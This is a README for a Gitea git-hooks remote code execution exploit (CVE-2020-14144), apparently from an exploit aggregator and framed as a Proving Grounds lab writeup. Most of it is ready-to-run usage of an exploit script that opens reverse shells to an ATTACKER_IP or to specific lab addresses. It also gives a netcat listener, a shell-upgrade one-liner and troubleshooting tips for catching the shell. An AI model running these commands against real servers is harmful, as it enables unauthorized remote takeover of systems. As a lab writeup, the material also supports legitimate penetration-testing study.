Share
## https://sploitus.com/exploit?id=7975DB5A-1885-5501-B6E5-52A49C8288E0
# Gitea Git Hooks RCE (CVE-2020-14144)

> OffsecProvingGrounds Practice โ€” Roquefort Machine Writeup & POC

## Overview

| Item | Detail |
|------|--------|
| **Machine** | Roquefort (Proving Grounds Practice) |
| **OS** | Linux |
| **Gitea Version** | 1.7.5 |
| **CVE** | CVE-2020-14144 |
| **Vector** | Authenticated RCE via Git Hooks |
| **User Shell** | `chloe` |

Gitea versions **1.1.0 โ†’ 1.12.5** allow authenticated users with *"May create git hooks"* permission to inject arbitrary shell commands into `post-receive` hooks. Pushing a commit triggers the hook and executes the payload on the server.

## Quick Start

### Automated (Python Script)

```bash
# Linux target โ€” reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux

# Windows target โ€” PowerShell reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows
```

### Manual

See [MANUAL.md](MANUAL.md) for step-by-step exploitation guide.

## Repository Structure

```
.
โ”œโ”€โ”€ README.md          # This file
โ”œโ”€โ”€ MANUAL.md          # Manual exploitation guide (Linux + Windows)
โ””โ”€โ”€ exploit.py         # Automated exploit script
```

## Requirements

- Python 3.6+
- `requests` library (`pip install requests`)
- `git` installed on the attacker machine
- Valid Gitea credentials with git hook permissions

## Usage

```
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
                  [--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]

Roquefort โ€” Gitea Authenticated RCE via Git Hooks (CVE-2020-14144)

required arguments:
  -t, --target       Target Gitea URL (e.g. http://192.168.x.x:3000)
  -u, --username     Gitea username
  -p, --password     Gitea password
  -I, --rev-ip       Attacker listener IP
  -P, --rev-port     Attacker listener port

optional arguments:
  --os               Target OS: linux (default) or windows
  --repo             Repository name to create (default: exploit)
  -f, --payload-file Custom shell script payload file
  -v, --verbose      Verbose output
```

### Examples

```bash
# 1) Start listener
nc -lvnp 4444

# 2) Run exploit (Linux target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444

# 3) Run exploit (Windows target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 --os windows

# 4) Custom payload file
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 -f payload.sh
```

## Shell Upgrade (Post-Exploitation)

After catching the reverse shell:

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg
```

## Troubleshooting

| Problem | Solution |
|---------|----------|
| `fatal: dubious ownership` | Clone from `~` instead of shared folders, or run `git config --global --add safe.directory '*'` |
| No connection received | Verify attacker IP, check firewall, confirm both machines on same subnet |
| Hook fires but no shell | Test with `touch /tmp/pwned` payload first โ€” if file appears, reverse shell is being blocked |
| Permission denied on hooks | User lacks hook permissions โ€” needs admin or "May create git hooks" privilege |
| Port conflict on 3000 | Gitea uses 3000 โ€” use a different port like 4444 for your listener |

## References

- [CVE-2020-14144 โ€” NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-14144)
- [Gitea Issue #13058](https://github.com/go-gitea/gitea/issues/13058)
- [p0dalirius Original POC](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce)

## Disclaimer

This tool is intended for authorized penetration testing and educational purposes only. Unauthorized access to computer systems is illegal. Use responsibly.